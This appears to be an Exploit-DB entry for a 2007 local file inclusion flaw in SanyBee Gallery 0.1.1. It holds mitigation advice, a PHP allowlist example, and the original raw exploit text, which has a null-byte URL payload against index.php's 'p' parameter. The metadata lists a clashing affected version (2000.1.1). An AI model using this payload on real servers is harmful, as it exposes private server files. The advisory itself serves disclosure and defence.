vendor: SanyBee Gallery
by: jackal
CVSS: N/A
N/A
Local File Inclusion
CWE: Unknown
Product Name: SanyBee Gallery
Affected Version From: 2000.1.1
Affected Version To: 2000.1.1
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2007

SanyBee Gallery 0.1.1 (p) Local File Inclusion

The vulnerability allows an attacker to include local files from the server by manipulating the 'p' parameter of index.php in SanyBee Gallery 0.1.1. By appending '%00' (a URL-encoded null byte) to the parameter value, the attacker can bypass input validation and include arbitrary files.

Mitigation:

Apply a patch or update to a newer version of the script that fixes the vulnerability. Validate and sanitize user input to prevent file inclusion attacks.
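
One way to apply the input validation described above, shown as an added example that is not SanyBee Gallery's code and not part of the original advisory: the 'p' value is used only as a key into a fixed allowlist and is never concatenated into a file path. The page names, the pages/ directory and the resolve_page() function are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based resolver for a `p` query parameter.
// PAGES_DIR, PAGE_MAP and resolve_page() are hypothetical names, not the
// gallery's real layout or API.

const PAGES_DIR = __DIR__ . '/pages';

// Accepted `p` values mapped to fixed file names.
// Request data never becomes part of a path.
const PAGE_MAP = [
    'home'    => 'home.php',
    'gallery' => 'gallery.php',
    'upload'  => 'upload.php',
];

function resolve_page($p): ?string
{
    // Reject non-strings (?p[]=x) and any value carrying a null byte.
    if (!is_string($p) || strpos($p, "\0") !== false) {
        return null;
    }
    // Only short lowercase identifiers: no dots, slashes or percent signs.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $p)) {
        return null;
    }
    if (!array_key_exists($p, PAGE_MAP)) {
        return null;
    }
    // Defence in depth: the resolved file must exist inside PAGES_DIR.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$p]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['p'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
require $page;
```

Because the include target comes from PAGE_MAP rather than from the request, a value containing a null byte or a path separator is rejected before any filesystem call is made.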

Exploit-DB raw data:

################################################################################
# SanyBee Gallery 0.1.1  (p)  local File Inclusion
#  
# Script Name:  SanyBee Gallery 0.1.1
#        
# D.Script: http://www.easy-script.com/scripts-dl/SanyBeeGallery_V0.1.0.zip
#                                                                                                            
# Discovered by:  jackal                                    
#
# contact: mi3adi@hotmail.fr                                                        
################################################################################


*==Exploit==*
================================================================

http://www.target.com/[SanyBee Gallery 0.1.1]/index.php?p=[ LFI ]%00
================================================================

Thanx: [cold-zer0]==&==[kof]==&==[firas]

GreeTz: [M]oRoCCaN [S]aBoTaGe [T]eaM

# milw0rm.com [2007-12-30]